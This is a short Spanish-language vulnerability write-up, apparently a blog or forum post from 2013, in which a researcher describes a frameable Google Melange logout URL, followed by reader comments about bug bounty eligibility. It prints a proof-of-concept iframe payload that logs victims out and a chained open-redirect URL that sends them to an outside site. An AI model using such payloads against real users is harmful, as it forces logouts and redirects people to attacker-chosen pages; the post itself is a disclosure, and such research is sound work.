He estado en estos días con un poco de tiempo libre así que me puse a buscar vulnerabilidades en google solo por diversión ya que es un target dificil, curiosamente encontré una vulnerabilidad, un link que si le mandas, lo deslogueas de su cuenta, se que muchos dirán click derecho al boton de desloguear copiar enlace y mandar eso, pero no, yo encontré una vulnerabilidad, una url de deslogueo es iframeable por lo que es vulnerable a ClickJacking y todos los ataques basados en FRAME por eso lo generalizo con Cross Site Framing... Sin mas que decir... un videito de la vuln.
Espero les guste, no hubo ni recompensa ni HoF pero me divertí mucho y eso cuenta...
Exploit:
<iframe src="http://www.google-melange.com/_ah/logout?continue=https://www.google.com/accounts/Logout%3Fcontinue%3Dhttps://appengine.google.com/_ah/logout%253Fcontinue%253Dhttp://www.google-melange.com/gsoc/document/show/gsoc_program/google/gsoc2013/about_page%26service%3Dah" ></iframe>
Además una redirección:
http://www.google-melange.com/_ah/logout?continue=https://www.google.com/accounts/Logout%3Fcontinue%3Dhttps://appengine.google.com/_ah/logout%253Fcontinue%253Dhttp://seguridadblanca.in
Fuente: http://dedalo.seguridadblanca.in/2013/08/google-xsrf-cross-site-framing-no-vrp_19.html
Saludos,
Dedalo.
Muy buen post Dedalo!!
Te daran recompensa?
No, para ellos no califica, a mi me parece que debieron aun que sea haberme dado mención honorable pero si para ellos no es, ya yo no puedo hacer nada igual el equipo de google contestó de manera rápida y me divertí.
A mi me pasó lo mismo con el XSS de Blogger... Decian que no calificaba como un bug critico y que por eso no me darian nada jajaja
Pero en donde hay un bug, hay dos o no? jajaja
El dominio esta protegido por sandbox, y es obvio que no daran una recompensa o mencionarlo en el "Hall of Fame" :).
Saludos.
No hubo recompensa porque es XSRF de log-out no es dominio de sanbox... googleusercontent es el de sandbox
Saludos,
Dedalo.
No solo es "googleusercontent.com" también hay muchos sandbox (googlegroup.com, googlecode.com, etc.)